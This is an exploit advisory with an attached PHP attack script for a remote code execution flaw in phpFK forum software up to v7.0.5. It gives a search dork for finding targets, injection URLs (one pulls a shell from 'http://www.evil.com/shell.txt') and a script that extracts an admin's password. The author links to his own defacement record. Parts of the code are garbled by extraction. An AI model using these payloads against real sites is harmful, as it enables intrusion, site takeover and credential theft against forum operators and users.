phpFK <= v7.0.5 Remote Code Execution
| _______ __ ______ |
| | | |.--.--.| |--..-----. | |.----..-----..--.--.--. |
| | || | || < | -__| | ---|| _|| -__|| | | | |
| |__|____||_____||__|__||_____| |______||__| |_____||________| |
| Name: phpFK <= v7.0.5 RCE |
| Software: phpFK <= v7.0.5 |
| Site: http://frank-karau.de/ |
| Download: http://frank-karau.de/download/phpfk_php_forum_7.05.zip |
| Vulnerability: Remote Code Execution |
| Severity: medium ( low / medium / high ) |
| Tested on: v7.0.5 |
| Dork: "© phpFK" |
| Requires: register_globals = On |
| Author: Lord-Anubis |
| Contact: lord.anu bis4[at]gm ail[dot]com |
| Date: 21.06.2010 ( dd.mm.yyyy ) |
| Site: http://lordanubis.altervista.org/ |
| Defaces: http://www.zone-h.org/archive/notifier=Lord-Anubis |
| Exploits: http://inj3ct0r.com/author/2486 |
| Bug File: include/init.php |
| 25. if (ini_get('register_globals')) |
| 26. { |
| 27. foreach(___FCKpd___0
GET as $s_name => $s_value) |
| 28. { |
| 29. eval('
.$s_name.' = \'\';'); |
| 30. } |
| 31. foreach(___FCKpd___0
POST as $s_name => $s_value) |
| 32. { |
| 33. eval('
.$s_name.' = \'\';'); |
| 34. } |
| 35. } |
| Bug Explanation: |
| - EN: In the file include/init.php the register_globals being disabled by cycling the variables GET/POST and through |
| the function eval they being overwritten and they will be unusables.... It's possible execute the code using |
| the function eval. It's Sufficent insert some evil code in the variable GET/POST's Key. |
| Examples: |
| 1) http://www.[site].com/[path]/index.php?a;require(str_replace('_',chr(46),'data/user/[nickAdmin].usr.ini'))?> |
| 2) http://www.[site].com/[path]/index.php?a;require(str_replace('_',chr(46),'http://www.evil.com/shell.txt'))?> |
| //////////////////////////////////////////////////////////////////////////////////////////////////////////////////// |
| - ITA: Nel file include/init.php le register_globals vengono disabilitate ciclando la variabili GET/POST e tramite |
| la funzione eval vengono sovrascritte in modo da renderle inutilizzabili... и possibile eseguire del codice |
| sfruttando la stessa funzione eval. Basterа inserire del codice nocivo nella chiave della variabile GET/POST. |
| Esempi validi sono: |
| 1) http://www.[site].com/[path]/index.php?a;require(str_replace('_',chr(46),'data/user/[nickAdmin].usr.ini'))?> |
| 2) http://www.[site].com/[path]/index.php?a;require(str_replace('_',chr(46),'http://www.evil.com/shell.txt'))?> |
| //////////////////////////////////////////////////////////////////////////////////////////////////////////////////// |
| - PL: ... |
| Exploit: |
* exploit.php
* Software: phpFK <= v7.0.5
* Author: Lord-Anubis <lord.anu bis4[at]gm ail[dot]com>
* Vulnerability: Remote Code Execution
ini_set("max_execution_time", 0);
function codeExec() {
global $userName;
return "a;require(str_replace(%27_%27,chr(46),%27data/user/{$userName}.usr.ini%27))?%3E";
if ($argc != 3) {
"[+] Software: phpFK <= v7.0.5\n".
"[+] Author: Lord-Anubis\n".
"[+] Vulnerability: Remote Code Execution\n".
"[+] Usage: ./exploit [hostName] [path] [evilUserName]\n".
"[+] Example:\n".
"[+] ./exploit / admin\n".
"[+] ./exploit hostname.com /phpFK/ moderator\n"
list($cli, $hostName, $path, $userName) = $argv
if (!preg_match('/password\=([a-zA-Z0-9]+)/is', file_get_contents("http://{$hostName}{$path}index.php?".codeExec()), $return)) {
exit("[-] Exploit failed\n");
echo("[+] Password: {$return[1]}\n");
echo("[+] Exploit successfull\n");